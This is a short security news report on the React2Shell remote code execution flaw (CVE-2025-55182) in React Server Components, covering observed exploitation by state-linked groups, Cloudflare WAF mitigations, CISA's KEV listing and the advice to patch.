Security researchers have sounded the alarm over the critical React2Shell remote code execution vulnerability (CVE-2025-55182), which affects over 77,000 internet-exposed IP addresses worldwide. The flaw, which allows unauthenticated remote code execution via a single HTTP request, has already been exploited by threat actors to compromise more than 30 organisations across multiple sectors, including intrusions linked to known state-associated Chinese hacking groups.
The React2Shell vulnerability exists in all frameworks that implement React Server Components, including Next.js, and requires developers to update React, rebuild their applications, and redeploy to fix the issue. Researchers have observed widespread exploitation, with attackers using automated tools to scan for vulnerable systems and execute base64-encoded PowerShell commands to download and deploy additional malware, such as Cobalt Strike beacons and the Snowlight and Vshell backdoors associated with Chinese threat actors.
In response to the severity of the flaw, organisations worldwide have rushed to patch their systems, with Cloudflare rolling out emergency detections and mitigations in its Web Application Firewall (WAF) and the Cybersecurity and Infrastructure Security Agency (CISA) adding CVE-2025-55182 to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply the necessary updates by December 26, 2025. All organisations using React Server Components or related frameworks should immediately apply the available patches and closely monitor their systems for signs of compromise.